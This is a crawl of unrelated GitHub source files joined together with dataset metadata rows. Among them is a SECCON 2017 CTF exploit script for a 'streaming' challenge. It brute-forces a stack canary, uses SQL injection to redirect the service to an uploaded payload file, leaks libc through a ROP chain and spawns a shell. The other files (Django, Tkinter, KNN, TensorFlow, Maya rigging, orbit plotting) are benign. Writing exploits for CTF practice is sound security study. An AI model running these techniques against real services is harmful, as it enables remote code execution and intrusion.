"""tilltheend URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/3.2/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.urls import path from forever import views from django.conf import settings from django.conf.urls.static import static urlpatterns = [ path('login', views.login_request, name='login'), path('logout', views.logout_request, name='logout'), path('register', views.register, name='register'), path('', views.index, name='home'), path('todo', views.todoadd, name='todo'), path('translate', views.translate, name='translate'), path('texttospech', views.texttospech, name='texttospech'), path('qrcode', views.qrcode, name='qrcode'), path('weather', views.weather, name='weather'), path('download', views.download_video, name='download'), path('delete/<int:id>', views.delete, name='delete'), path('doing/<int:id>', views.doing, name='doing'), path('finish/<int:id>', views.finish, name='finish'), path('history/<int:id>', views.history, name='history'), path('news', views.news, name='news'), ] if settings.DEBUG: urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
king9799/7-1-projects
forever/urls.py
urls.py
py
1,695
python
en
code
0
github-code
6
32284951119
#!/usr/bin/env python from sc_expwn import * # https://raw.githubusercontent.com/shift-crops/sc_expwn/master/sc_expwn.py bin_file = './streaming' context(os = 'linux', arch = 'amd64') # context.log_level = 'debug' #========== env = Environment('debug', 'local', 'remote') env.set_item('mode', debug = 'DEBUG', local = 'PROC', remote = 'SOCKET') env.set_item('target', debug = {'argv':[bin_file], 'aslr':False}, \ local = {'argv':[bin_file]}, \ remote = {'host':'localhost', 'port':8000}) env.select('remote') #========== binf = ELF(bin_file) addr_send_message = binf.sep_function['send_message'] addr_csu_init = binf.sep_function['__libc_csu_init'] addr_got_main = binf.got['__libc_start_main'] addr_got_read = binf.got['read'] addr_got_write = binf.got['write'] addr_bss = binf.sep_section['.bss'] addr_csu_init_1st = addr_csu_init + 0x5a addr_csu_init_2nd = addr_csu_init + 0x40 addr_buf = addr_bss + 0x900 addr_buf2 = addr_bss + 0xe00 libc = binf.libc offset_libc_main = libc.sep_function['__libc_start_main'] path = './music/' name = 'a' offset = 0x1b8 #========== def attack(conn): canary = 0x44288b3fb3615500 #canary = detect_canary(env) info('canary = 0x{:08x}'.format(canary)) put_mulmusic(canary) libc.address = detect_libc_base(conn) addr_libc_str_sh = libc.search('/bin/sh').next() info('addr_libc_base = 0x{:08x}'.format(libc.address)) shell = raw_input('shell?(Y/n)')[0] != 'n' rop = ROP(libc) if shell: rop.dup2(4, 0) rop.dup2(4, 1) rop.dup2(4, 2) rop.system(addr_libc_str_sh) #rop.execve(addr_libc_str_sh, 0, 0) else: message = '192.168.115.1'.ljust(0x10, '\x00') message += 'test\x00' rop.read(4, addr_buf2, len(message)) for i in range(0x10): rop.call(addr_send_message, [addr_buf2, 4296, addr_buf2+0x10]) exploit = p64(0xdeadbeef) exploit += str(rop) conn.send(exploit) if not shell: sleep(0.1) conn.send(message) def put_mulmusic(canary): rop = ROP(binf) exploit = 'a'*offset exploit += p64(canary) exploit += '\x00'*0x10 exploit += p64(0xdeadbeef) exploit += p64(addr_csu_init_1st) exploit += p64(0) # rbx exploit += p64(1) # rbp exploit += p64(addr_got_write) # r12 exploit += p64(8) # r13 exploit += p64(addr_got_main) # r14 exploit += p64(4) # r15 exploit += p64(addr_csu_init_2nd) exploit += p64(0xdeadbeef) exploit += p64(0) # rbx exploit += p64(1) # rbp exploit += p64(addr_got_read) # r12 exploit += p64(0x10000) # r13 exploit += p64(addr_buf) # r14 exploit += p64(4) # r15 exploit += p64(addr_csu_init_2nd) exploit += p64(0xdeadbeef) exploit += p64(0) # rbx exploit += p64(addr_buf) # rbp exploit += p64(0) # r12 exploit += p64(0) # r13 exploit += p64(0) # r14 exploit += p64(4) # r15 exploit += p64(rop.leave.address) upload_file(name, exploit) def detect_libc_base(conn): conn.send('\x80') conn.sendafter('\x10'+p32(0x24), ("' union select '%s', 16#" % path+name).ljust(36)) conn.sendafter('\x11'+p32(0x40), ''.ljust(64)) conn.sendafter('\x20'+p32(0), '\x84') conn.sendafter('\x14'+p32(8), p64(0x3ff)) addr_libc_main = u64(conn.recv(8)) addr_libc_base = addr_libc_main - offset_libc_main return addr_libc_base def detect_canary(env): log = context.log_level context.log_level = 100 canary = '\x00' while len(canary) < 8: exploit = 'a'*offset exploit += ''.join([canary+chr(i) for i in range(0x100)]) upload_file(name, exploit) for i in range(0, 0x100): conn = communicate(env.mode, **env.target) conn.send('\x80') conn.sendafter('\x10'+p32(0x24), ("' union select '%s', 16#" % path+name).ljust(36)) conn.sendafter('\x11'+p32(0x40), ''.ljust(64)) conn.sendafter('\x20'+p32(0), '\x83') conn.sendafter('\x13'+p32(8), p64((len(canary)+1)*i)) conn.sendafter('\x23', '\x84') conn.sendafter('\x14'+p32(8), p64(offset+len(canary)+1)) try: conn.recv() except: found = False else: found = True finally: conn.close() if found : context.log_level = log info('canary found : 0x%02x' % i) context.log_level = 100 canary += chr(i) break context.log_level = log return u64(canary) def upload_file(name, data): open(path+name, "wb").write(data) #========= if __name__=='__main__': conn = communicate(env.mode, **env.target) attack(conn) conn.interactive() #==========
shift-crops/CTFProblemArchive
2017/SECCON Finals/Domestic/fuchu/streaming/exploit.py
exploit.py
py
5,229
python
en
code
1
github-code
6
27099804006
from grid_box import GridBox class PortfolioDialog: def getInitialFileName(self): return "portfolio" def getInitialFolder(self): return preferences.portfolio_last_opened_dir() def addFormElements(self, master): self.description = self.addEntry(master, "Description:", ValidateNotBlank(master), self.config.description) #Items label = Label(master, text="Portfolio Items:") label.grid(row=self.row, sticky=W, column=self.titleColumn, columnspan = 2) self.row += 1 self.itemsListBoxEntry = self.addListBox(master, "Items ListBox", height = 10) self.validateItems = ValidatePortfolioItems(master, self.itemsListBoxEntry.listbox) self.validations.append(self.validateItems) self.validateItems.messageLabel.grid(row=self.row, sticky=W, column=self.messageColumn) headers = ["Description","Diameter","HubHeight","RatedPower","CutOutWindSpeed","Datasets"] self.items_grid_box = GridBox(master, headers) self.items_grid_box.edit = self.edit_item if not self.isNew: for item in self.config.items: self.items_grid_box.add_item(item) self.validateItems.validate() def setConfigValues(self): self.config.path = self.filePath.get() self.config.description = self.description.get() #exclusions self.config.items = [] for i in range(self.itemsListBoxEntry.listbox.size()): if i > 0: values = extractPortfolioItemValuesFromText(self.itemsListBoxEntry.listbox.get(i)) self.config.addItem(description = values[0], \ diameter = values[1], \ hubHeight = values[2], \ ratedPower = values[3], \ cutOutWindSpeed = values[4], \ datasets = values[5]) def new_item(self): PortfolioItemDialog(self, configuration.RelativePath(self.filePath.get()), self.status, self.addPortfolioItemFromText) self.validateItems.validate() def edit_item(self, event = None): items = self.itemsListBoxEntry.listbox.curselection() if len(items) == 1: idx = int(items[0]) if idx > 0: text = self.itemsListBoxEntry.listbox.get(items[0]) try: PortfolioItemDialog(self, configuration.RelativePath(self.filePath.get()), self.status, self.addPortfolioItemFromText, text, idx) except ExceptionType as e: self.status.addMessage("ERROR loading config (%s): %s" % (text, e)) def remove_item(self): items = self.itemsListBoxEntry.listbox.curselection() pos = 0 for i in items: idx = int(i) - pos if idx > 0: self.itemsListBoxEntry.listbox.delete(idx, idx) pos += 1 self.validateItems.validate() def addPortfolioItemFromText(self, text, index = None): if index != None: self.itemsListBoxEntry.listbox.delete(index, index) self.itemsListBoxEntry.listbox.insert(index, text) else: self.itemsListBoxEntry.listbox.insert(END, text) class PortfolioItemDialog(BaseDialog): def __init__(self, master, relativePath, status, callback, text = None, index = None): self.relativePath = relativePath self.callback = callback self.text = text self.index = index self.callback = callback self.isNew = (text == None) BaseDialog.__init__(self, master, status) def body(self, master): self.prepareColumns(master) #dummy label to force width Label(master, text=" " * 275).grid(row = self.row, sticky=W, column=self.titleColumn, columnspan = 8) self.row += 1 if not self.isNew: items = extractPortfolioItemValuesFromText(self.text) description = items[0] diameter = items[1] hubHeight = items[2] ratedPower = items[3] cutOutWindSpeed = items[4] datasets = items[5] else: description = None diameter = None hubHeight = None ratedPower = None cutOutWindSpeed = None datasets = None self.addTitleRow(master, "Portfolio Item Settings:") self.description = self.addEntry(master, "Description:", ValidateNotBlank(master), description) self.diameter = self.addEntry(master, "Diameter:", ValidateNonNegativeFloat(master), diameter) self.hubHeight = self.addEntry(master, "Hub Height:", ValidateNonNegativeFloat(master), hubHeight) self.ratedPower = self.addEntry(master, "Rated Power:", ValidateNonNegativeFloat(master), ratedPower) self.cutOutWindSpeed = self.addEntry(master, "Cut Out Wind Speed:", ValidateNonNegativeFloat(master), cutOutWindSpeed) self.datasetsListBoxEntry = self.addListBox(master, "Datasets ListBox") if not self.isNew: for dataset in datasets: self.datasetsListBoxEntry.listbox.insert(END, dataset) self.datasetsListBoxEntry.listbox.grid(row=self.row, sticky=W+E+N+S, column=self.labelColumn, columnspan=2) self.validateDatasets = ValidateDatasets(master, self.datasetsListBoxEntry.listbox) self.validations.append(self.validateDatasets) self.validateDatasets.messageLabel.grid(row=self.row, sticky=W, column=self.messageColumn) self.newDatasetButton = Button(master, text="New", command = self.NewDataset, width=5, height=1) self.newDatasetButton.grid(row=self.row, sticky=E+N, column=self.secondButtonColumn) self.editDatasetButton = Button(master, text="Edit", command = self.EditDataset, width=5, height=1) self.datasetsListBoxEntry.listbox.bind("<Double-Button-1>", self.EditDataset) self.editDatasetButton.grid(row=self.row, sticky=E+S, column=self.secondButtonColumn) self.addDatasetButton = Button(master, text="+", command = self.addDataset, width=2, height=1) self.addDatasetButton.grid(row=self.row, sticky=E+N, column=self.buttonColumn) self.removeDatasetButton = Button(master, text="-", command = self.removeDatasets, width=2, height=1) self.removeDatasetButton.grid(row=self.row, sticky=E+S, column=self.buttonColumn) #dummy label to indent controls Label(master, text=" " * 5).grid(row = (self.row-1), sticky=W, column=self.titleColumn) def apply(self): datasets = [] for i in range(self.datasetsListBoxEntry.listbox.size()): dataset = self.relativePath.convertToRelativePath(self.datasetsListBoxEntry.listbox.get(i)) datasets.append(dataset) self.text = encodePortfolioItemValuesAsText(self.description.get().strip(), \ self.diameter.get(), \ self.hubHeight.get(), \ self.ratedPower.get(), \ self.cutOutWindSpeed.get(), \ datasets) if self.isNew: self.status.addMessage("Portfolio Item created") else: self.status.addMessage("Portfolio Item updated") if self.index== None: self.callback(self.text) else: self.callback(self.text, self.index) def EditDataset(self, event = None): items = self.datasetsListBoxEntry.listbox.curselection() if len(items) == 1: index = items[0] path = self.datasetsListBoxEntry.listbox.get(index) try: datasetConfig = configuration.DatasetConfiguration(self.relativePath.convertToAbsolutePath(path)) DatasetConfigurationDialog(self, self.status, self.addDatasetFromPath, datasetConfig, index) except ExceptionType as e: self.status.addMessage("ERROR loading config (%s): %s" % (path, e)) def NewDataset(self): try: config = configuration.DatasetConfiguration() DatasetConfigurationDialog(self, self.status, self.addDatasetFromPath, config) except ExceptionType as e: self.status.addMessage("ERROR creating dataset config: %s" % e) def addDataset(self): fileName = askopenfilename(parent=self.master, initialdir=preferences.dataset_last_opened_dir(), defaultextension=".xml") if len(fileName) > 0: self.addDatasetFromPath(fileName) def addDatasetFromPath(self, path, index = None): try: preferences.datasetLastOpened = path preferences.save() except ExceptionType as e: self.addMessage("Cannot save preferences: %s" % e) path = self.relativePath.convertToRelativePath(path) if index != None: self.datasetsListBoxEntry.listbox.delete(index, index) self.datasetsListBoxEntry.listbox.insert(index, path) else: self.datasetsListBoxEntry.listbox.insert(END, path) self.validateDatasets.validate() def removeDatasets(self): items = self.datasetsListBoxEntry.listbox.curselection() pos = 0 for i in items: idx = int(i) - pos self.datasetsListBoxEntry.listbox.delete(idx, idx) pos += 1 self.validateDatasets.validate() if __name__ == "__main__": dialog = PortfolioDialog(self.root, WindowStatus(self), self.LoadPortfolioFromPath, portfolioConfiguration)
PCWG/PCWG
test-gui/gui/pcwg_ui/portfolio.py
portfolio.py
py
10,704
python
en
code
23
github-code
6
32644493827
import pymel.core as pm from mgear.core import attribute class customShifterMainStep(object): ''' Main Class for shifter custom steps ''' def __init__(self, stored_dict): """Constructor """ self._step_dict = stored_dict @property def mgear_run(self): """Returns the resulting object of the 'mgearRun' step. """ if "mgearRun" not in self._step_dict: raise Exception( "Can't access the 'mgearRun' in pre steps \ or when running individual steps.") return self._step_dict.get('mgearRun') def component(self, name): """Access to components from the current build process. Args: name (str): The name of the component Returns: Component: The matching Component object """ if name not in self.mgear_run.components: raise KeyError("Could not find the '{}' component.".format(name)) return self.mgear_run.components[name] def custom_step(self, name): """Allows access to custom steps that have already ran in the past. Args: name (str): The name of the custom step Returns: customShifterMainStep: The matching customShifterMainStep object """ if name not in self._step_dict: raise KeyError( "The custom step '{}' does not exist, or \ did not run yet.".format(name)) return self._step_dict[name] def setup(self): """This function mus be re implemented for each custom step. Raises: Exception: Description """ raise NotImplemented("'setup' must be implemented") def run(self): """This function mus be re implemented for each custom step. Raises: Exception: Description """ raise NotImplemented("'run' must be implemented") def dup(self, source, name=None): """Duplicate the source object and rename it Args: source (PyNode): The Source object to duplicate name (None, string): The name for the new object. If the value is None the name will be set by using the custom step name Returns: PyNode: The new duplicated object. """ dup = pm.duplicate(source)[0] dup.visibility.set(True) attribute.unlockAttribute(dup) if name: pm.rename(dup, name) else: pm.rename(dup, "_".join([source.name(), self.name, "setup"])) pm.parent(dup, self.setup_root) return dup
mgear-dev/mgear4
release/scripts/mgear/shifter/custom_step.py
custom_step.py
py
2,657
python
en
code
209
github-code
6
27551842247
#K-Nearesst Neighbour #importing the Librares import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns #set the index value as index_col 0 data=pd.read_csv('./Dataset/Classified Data',index_col=0) #standardize the values from sklearn.preprocessing import StandardScaler #Create a object for StandardScaler scaler=StandardScaler() #fit and tranform the value to the standard values scaler.fit(data.drop('TARGET CLASS',axis=1)) scaled_features=scaler.transform(data.drop('TARGET CLASS',axis=1)) #This scaled data doesn't have index name and column name #store the scaled feature in a dataset #columns will fil the columns index #and also neglecting the target class because that is #independent feature df_feat=pd.DataFrame(scaled_features,columns=data.columns[:-1]) #sns.pairplot(data,hue='TARGET CLASS') #Separate the train and test data from sklearn.model_selection import train_test_split #first is independent feature ->input dependent feature -> output x_train,x_test,y_train,y_test=train_test_split(scaled_features,data['TARGET CLASS']) #k_nearest Neighbour from sklearn.neighbors import KNeighborsClassifier #Giving K=1 knn = KNeighborsClassifier(n_neighbors=1) knn.fit(x_train,y_train) pred=knn.predict(x_test) #use the confusion matrix to get the what are the values correctly perdicted #and unpredicted from sklearn.metrics import classification_report,confusion_matrix #here you can see which are all the values g print(confusion_matrix(pred,y_test)) #Give reports accuracy and other scores print(classification_report(pred,y_test)) #Run the error rate find the point falls below and predict the K value error_rate=[] for i in range(1,40): knn=KNeighborsClassifier(n_neighbors=i) knn.fit(x_train,y_train) pred=knn.predict(x_test) error_rate.append(np.mean(pred!=y_test)) #plot the error rate vs K values for the error rate calculated plt.figure(figsize=(10,6)) plt.plot(range(1,40),error_rate,linestyle="dashed",marker="o",markersize=10, markerfacecolor="red") plt.title("Error Rate Graph") plt.xlabel("K-value") plt.ylabel("Error_Rate") #here you can see that after k=24 it never touches back so choose that value knn=KNeighborsClassifier(n_neighbors=24) knn.fit(x_train,y_train) pred=knn.predict(x_test) #Confusion Matric print(confusion_matrix(y_test,pred)) #classification report print(classification_report(y_test,pred)) #You can see that accuracy has increased
kamarajanis/Machine-Learning
K_Nearest_Neighbor/k-nearest.py
k-nearest.py
py
2,535
python
en
code
0
github-code
6
21835433544
"""Labels app urls""" from django.urls import path from task_manager.labels.views import ( LabelsView, LabelUpdateView, LabelCreateView, LabelDeleteView, ) app_name = 'labels' urlpatterns = [ path('', LabelsView.as_view(), name='index'), path('<int:pk>/update/', LabelUpdateView.as_view(), name='upd_label'), path('<int:pk>/delete/', LabelDeleteView.as_view(), name='del_label'), path('create/', LabelCreateView.as_view(), name='create'), ]
GunGalla/python-project-52
task_manager/labels/urls.py
urls.py
py
476
python
en
code
0
github-code
6
20844849225
import tensorflow.compat.v1 as tf """ `image` is assumed to be a float tensor with shape [height, width, 3]. It is a RGB image with pixel values in the range [0, 1]. """ def random_color_manipulations(image, probability=0.5, grayscale_probability=0.1): """ This function randomly changes color of an image. It is taken from here: https://cloud.google.com/tpu/docs/inception-v3-advanced """ def manipulate(image): br_delta = tf.random_uniform([], -32.0/255.0, 32.0/255.0) cb_factor = tf.random_uniform([], -0.1, 0.1) cr_factor = tf.random_uniform([], -0.1, 0.1) red_offset = 1.402 * cr_factor + br_delta green_offset = -0.344136 * cb_factor - 0.714136 * cr_factor + br_delta blue_offset = 1.772 * cb_factor + br_delta channels = tf.split(axis=2, num_or_size_splits=3, value=image) channels[0] += red_offset channels[1] += green_offset channels[2] += blue_offset image = tf.concat(axis=2, values=channels) image = tf.clip_by_value(image, 0.0, 1.0) return image def to_grayscale(image): image = tf.image.rgb_to_grayscale(image) image = tf.image.grayscale_to_rgb(image) return image do_it = tf.less(tf.random_uniform([]), probability) image = tf.cond(do_it, lambda: manipulate(image), lambda: image) do_it = tf.less(tf.random_uniform([]), grayscale_probability) image = tf.cond(do_it, lambda: to_grayscale(image), lambda: image) return image def random_pixel_value_scale(image, probability=0.5, minval=0.9, maxval=1.1): """ This function scales each pixel independently of the other ones. Arguments: image: a float tensor with shape [height, width, 3], an image with pixel values varying between zero and one. probability: a float number. minval: a float number, lower ratio of scaling pixel values. maxval: a float number, upper ratio of scaling pixel values. Returns: a float tensor with shape [height, width, 3]. """ def random_value_scale(image): color_coefficient = tf.random_uniform( tf.shape(image), minval=minval, maxval=maxval, dtype=tf.float32 ) image = tf.multiply(image, color_coefficient) image = tf.clip_by_value(image, 0.0, 1.0) return image do_it = tf.less(tf.random_uniform([]), probability) image = tf.cond(do_it, lambda: random_value_scale(image), lambda: image) return image
TropComplique/MultiPoseNet
detector/input_pipeline/color_augmentations.py
color_augmentations.py
py
2,540
python
en
code
9
github-code
6
73696099389
import os import subprocess from datetime import timedelta from . import dispersion_file_utils as dfu from .dispersiongrid import BSDispersionGrid, BSDispersionPlot, create_color_plot class PolygonGenerator(object): """Generates polygon kmls from a NETCDF file representing smoke dispersion time series. Public Instance Attributes: output_dir - output directory containing generated polygon kmls, legend, xsl file, and cutpoints file legend_filename - legend's file name kml_files - list of tuples of the form (<kml file name>, <prediction timestamp>) """ # HACK: It would be more elegant to generate xml using an XML package, like minidom. # We're using raw strings for speed of implementation. XSL_FIRST_PART = r"""<?xml version="1.0"?> <!-- This is an xsl stylesheet to add styles to an OGR generated KML file --> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:kml="http://www.opengis.net/kml/2.2" version="1.0"> <xsl:output method="xml" indent="yes" omit-xml-declaration="no" encoding="utf-8"/> <!-- In general, just pass through all elements and attributes --> <xsl:template match="*"> <xsl:copy> <xsl:copy-of select="@*" /> <xsl:apply-templates /> </xsl:copy> </xsl:template> <!-- We want to eliminate any embedded style because we don't want to hide the external styles --> <xsl:template match="kml:Style" /> <!-- Eliminate Schema and ExtendedData --> <xsl:template match="kml:Schema" /> <xsl:template match="kml:ExtendedData" /> <xsl:template match="kml:Document"> <xsl:copy> <xsl:copy-of select="@*" /> """ XSL_STYLE_ELEMENT = """<Style id=\"%s\"> <PolyStyle> <color>%s</color> <fill>%s</fill> <outline>0</outline> </PolyStyle> </Style> """ XSL_LAST_PART = r"""<xsl:apply-templates /> </xsl:copy> </xsl:template> <xsl:template match="kml:Placemark"> <xsl:copy> <xsl:copy-of select="@*" /> <styleUrl><xsl:value-of select="./kml:ExtendedData/kml:SchemaData/kml:SimpleData[@name='Category']" /></styleUrl> <xsl:apply-templates /> </xsl:copy> </xsl:template> </xsl:stylesheet> """ POLYGONS_CONFIG_SECTION = 'PolygonsKML' # TODO: pass in individual values from confif rather than config itself. def __init__(self, config, parameter): self._config = config self._parameter = parameter # TODO: support multiple color schemes self._color_bar_section = self._config.get(self.POLYGONS_CONFIG_SECTION, 'POLYGON_COLORS').split(',')[0] self._create_output_dir() self._import_grid() self._generate_custom_cutpoints_file() self._generate_custom_xsl_files() self._generate_kmls() self._generate_legend() def _create_output_dir(self): self.output_dir = self._config.get(self.POLYGONS_CONFIG_SECTION, 'POLYGONS_OUTPUT_DIR').rstrip('/') + '-' + self._parameter.lower() if not os.path.exists(self.output_dir): os.makedirs(self.output_dir) def _import_grid(self): self._infile = self._config.get('DispersionGridInput', "FILENAME") self._makepolygons_infile = "NETCDF:%s:%s" % (self._infile, self._parameter) self._grid = BSDispersionGrid(self._infile, param=self._parameter) # dispersion grid instance def _generate_custom_cutpoints_file(self): self._custom_cutpoints_filename = os.path.join(self.output_dir, 'CutpointsGateway.csv') newfile = open(self._custom_cutpoints_filename, 'w') newfile.write("Name,Threshold\n") levels = [s for s in self._config.get(self._color_bar_section, "DATA_LEVELS").split()] for i in range(len(levels)): newfile.write("Cat%d,%s\n" % (i, levels[i])) newfile.close() def _generate_custom_xsl_files(self): self._custom_xsl_filename = os.path.join(self.output_dir, 'KMLPolygonStyleGateway.xsl') newfile = open(self._custom_xsl_filename, 'w') newfile.write(self.XSL_FIRST_PART) hex_colors = self._parse_colors() for i in range(len(hex_colors)): if hex_colors[i] == '000000': color_str = '00000000' fill_str = '0' else: color_str = '99%s' % (hex_colors[i]) fill_str = '1' newfile.write(self.XSL_STYLE_ELEMENT % ("Cat%d" % (i), color_str, fill_str)) newfile.write(self.XSL_LAST_PART) newfile.close() def _parse_colors(self): if self._config.getboolean(self._color_bar_section, "DEFINE_RGB"): r = [int(s) for s in self._config.get(self._color_bar_section, "RED").split()] g = [int(s) for s in self._config.get(self._color_bar_section, "GREEN").split()] b = [int(s) for s in self._config.get(self._color_bar_section, "BLUE").split()] if not len(r) == len(g) == len(b): raise Exception("Configuration ERROR... RED, GREEN, BLUE must specify same number of values.") # kml colors are specified as 'aabbggrr' (where 'aa' is the alpha value) return ['%02x%02x%02x' % (b[i], g[i], r[i]) for i in range(len(r))] elif self._config.getboolean(self._color_bar_section, "DEFINE_HEX"): return [s.strip('#') for s in self._config.get(self._color_bar_section, "HEX_COLORS").split()] else: raise Exception("Configuration ERROR... DEFINE_RGB or HEX_COLORS must be true.") def _generate_kmls(self): self._kml_file_basename, ext = os.path.splitext(os.path.basename(self._infile)) dfu.create_polygon_kmls_dir(self._config, self._parameter) self.kml_files = [] # def my_output_handler(logger, output, is_stderr): # logger.log(OUTPUT, output) for i in range(self._grid.num_times): try: self._generate_kml(i) except: break def _generate_kml(self, i): dt = self._grid.datetimes[i] - timedelta(hours=1) band = i + 1 #self.log.debug("Processing %s band %2d: %s...", name, band, dt.strftime("%Y-%m-%d %HZ")) #kmlfile = dt.strftime(name + "_%Y%m%d%H.kml") kmlfile = self._kml_file_basename + str(band) + ".kml" poly_file = os.path.join(self.output_dir, kmlfile) #self.log.debug("Opened poly_file %s", poly_file) args = [ self._config.get(self.POLYGONS_CONFIG_SECTION, "MAKEPOLYGONS_BINARY"), "-in=" + self._makepolygons_infile, "-band=" + str(band), "-cutpoints=" + os.path.abspath(self._custom_cutpoints_filename), "-format=KML", "-kmlStyle=" + self._custom_xsl_filename, "-out=" + poly_file ] if subprocess.call(' '.join(args), shell=True) != 0: msg = "Failure while trying to create %s" % (poly_file) #self.log.error(msg) raise RuntimeError(msg) self.kml_files.append((kmlfile, dt)) LEGEND_FILENAME_ROOT = 'colorbar_polygons' def _generate_legend(self): plot = create_color_plot(self._config, self._parameter, self._grid, self._color_bar_section) root_w_parameter = "{}_{}".format(self._parameter.lower(), self.LEGEND_FILENAME_ROOT) plot.make_colorbar(os.path.join(self.output_dir, root_w_parameter)) self.legend_filename = "%s.%s" % (root_w_parameter, plot.export_format)
pnwairfire/blueskykml
blueskykml/polygon_generator.py
polygon_generator.py
py
7,736
python
en
code
0
github-code
6
74992294908
from django.core.exceptions import ValidationError from django.core.validators import MaxValueValidator, MinValueValidator from django.db import models from django.utils.translation import gettext_lazy as _ from django.contrib.postgres.fields import ArrayField from udemy.apps.core.models import TimeStampedBase, OrderedModel, CreatorBase from udemy.apps.course.models import Course from udemy.apps.module.models import Module from udemy.apps.quiz.annotations import QuizAnnotations class Quiz(TimeStampedBase, OrderedModel): title = models.CharField(_('Title'), max_length=200) description = models.TextField(_('Description')) is_published = models.BooleanField(default=False) is_draft = models.BooleanField(default=True) is_timed = models.BooleanField(default=False) pass_percent = models.PositiveIntegerField(validators=[MaxValueValidator(100)]) module = models.ForeignKey( Module, related_name='quizzes', on_delete=models.CASCADE, ) course = models.ForeignKey( Course, related_name='quizzes', on_delete=models.CASCADE, ) order_in_respect = ('course', 'module') annotation_class = QuizAnnotations() class Question(TimeStampedBase, OrderedModel): question = models.TextField() feedback = models.TextField() answers = ArrayField(models.TextField()) max_time = models.PositiveIntegerField(default=0) quiz = models.ForeignKey( Quiz, related_name='questions', on_delete=models.CASCADE ) course = models.ForeignKey( Course, related_name='questions_quiz', on_delete=models.CASCADE, ) correct_response = models.IntegerField(validators=[MinValueValidator(1)]) order_in_respect = ('quiz',) def save(self, *args, **kwargs): if self.correct_response > len(self.answers): raise ValidationError({'correct_response': 'invalid response'}) super().save(*args, **kwargs) class QuizRelation(CreatorBase, TimeStampedBase): quiz = models.ForeignKey(Quiz, on_delete=models.CASCADE) done = models.BooleanField(default=False) class Meta: constraints = [ models.UniqueConstraint(fields=('creator', 'quiz'), name='unique quiz relation')]
gabrielustosa/udemy-old
udemy/apps/quiz/models.py
models.py
py
2,272
python
en
code
0
github-code
6
34465989712
import math import numpy as np import pandas as pd n = 10 x = np.random.randint(0, 50, n) y = np.random.randint(0, 50, n) lista = [] listb = [] listc = [] for i in range(n-1): for j in range(i+1, n): lista.append((x[i]-x[j])*(x[i]-x[j])) listb.append((y[i]-y[j])*(y[i]-y[j])) for i in range(len(lista)): listc.append(math.sqrt(lista[i]+listb[i])) print(listc) # 2 listd = [] x = np.random.randint(0, 50, [n, 2]) y = np.zeros([n, n]) for i in range(n): for j in range(i, n): y[i, j] = y[j, i] = np.sqrt(np.sum((x[i]-x[j])**2)) y = y.round(2) print(y)
lmyljjljh/shujufenxi
sjcjyfx/20221111b.py
20221111b.py
py
587
python
en
code
1
github-code
6
7241271696
#################### # Joint distribution of Ask/Bid Qty #################### import os import pickle import numpy as np import matplotlib.pyplot as plt from mpl_toolkits.mplot3d import Axes3D from mpl_toolkits.mplot3d import axes3d data_directory = 'data/xFGBL' img_directory = 'images/' data_file = 'xFGBL20130702.pkl' for fn in os.listdir(data_directory): with open(os.path.join(data_directory, fn), 'rb') as input: r=pickle.load(input) X = r['AskQty'] Y = r['BidQty'] bins = np.arange(0, 600, 20) hist, xedges, yedges = np.histogram2d(Y, X, bins=bins, normed=True) fig = plt.figure() fig.suptitle(fn, fontsize=20) ax = fig.add_subplot(111, projection='3d') elements = (len(xedges) - 1) * (len(yedges) - 1) X, Y = np.meshgrid(xedges[:-1]+0.25, yedges[:-1]+0.25) ax.plot_wireframe(X, Y, hist) # xpos = X.flatten() # ypos = Y.flatten() # zpos = np.zeros(elements) # dx = 10 * np.ones_like(zpos) # dy = dx.copy() # dz = hist.flatten() #ax.bar3d(xpos, ypos, zpos, dx, dy, dz, color='b', zsort='average') #ax.scatter(xpos, ypos, dz) #plt.show() plt.savefig(os.path.join(img_directory, fn + '.png'))
maroxe/SchoolProjects
EA/joint_distribution.py
joint_distribution.py
py
1,286
python
en
code
0
github-code
6
73783427069
''' File containing the PlottingCalculator class ''' import numpy as np import math from pyrigee.orbit import * ''' The PlottingCalculator class contains functions that calculate coordinates for plotting things. Used to reduce the amount of code in the OrbitPlotter class. ''' class PlottingCalculator: # The number of divisions in wireframe plots for bodies __PLANET_DIVS = 9j # The number of divisions in orbit plots __ORBIT_DIVS = 61 def __init__(self, t): self.__tick_value = t ''' Calculates the x, y, z coordinates of a sphere. Used to plot the body defined by the user. Takes the scaled radius, or the radius of the body scaled to the graph's tick units ''' def calculate_body_coords(self, scaled_radius): # Create theta and phi values that run from 0 to 2pi and 0 to pi, respectively theta, phi = np.mgrid[0:2 * np.pi:self.__PLANET_DIVS, 0:np.pi:self.__PLANET_DIVS] ''' Calculate x, y, and z of sphere given theta and phi ranges. Divide each radius by tick value to make sure that the units are correct when displayed ''' x = scaled_radius * np.cos(theta) * np.sin(phi) y = scaled_radius * np.sin(theta) * np.sin(phi) z = scaled_radius * np.cos(phi) return (x, y, z) ''' Calculates the coordinates of an elliptical orbit. Takes the orbits inclination, eccentricty, and semi-major axis. The transfer flag indicates whether or not this is a transfer orbit, in which case only half the orbit will be calculated. negative indicates whether or not the orbit should be flipped. Returns the x, y, z coords of the elliptical orbit scaled by __tick_value ''' def calculate_elliptical_orbit_coords(self, inclination, eccentricity, semi_major_axis, transfer, negative): # Number to multiply by pi by when bounding np.linepace. Default is -2 to plot an entire polar coordinate pi_multiplier = -2 # If user only wants to plot half the orbit, change pi multiplier to -1, so that np.linspace goes from 0 to pi if transfer: pi_multiplier = -1 theta = np.linspace(pi_multiplier * np.pi, 0, self.__ORBIT_DIVS) # Convert inclination to radians inclination = np.radians(inclination) # Polar equation of ellipse r = (semi_major_axis * (1 - eccentricity**2)) / (1 - eccentricity * np.cos((theta))) # Flip orbit if negative flag is true if negative: r *= -1 # Convert polar equations to cartesean coords based on the given orbital inclination x = r * np.cos(theta) * np.cos(inclination) y = r * np.sin(theta) z = x * np.tan(inclination) # Return the scaled coordinates of the elliptical orbit return self.calculate_scaled_coords(x, y, z) ''' Calculates the coordinates of a parabolic orbit. Takes an orbit object representing the orbit and the radius of the body being orbited. Returns the x, y, z coords of the orbit scaled by __tick_value ''' def 